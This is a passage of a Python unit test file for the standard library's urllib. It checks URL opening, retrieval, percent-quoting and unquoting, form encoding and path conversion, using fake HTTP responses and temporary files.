with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:[email protected]/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:[email protected]/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
        # this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
        # Characters in Latin-1 range, encoded with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
        The test cannot assume anything about ordering: the docs make no
        guarantee, and the input may be a dictionary.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII Encoding. Expect %3F with errors="replace'
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
        # Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
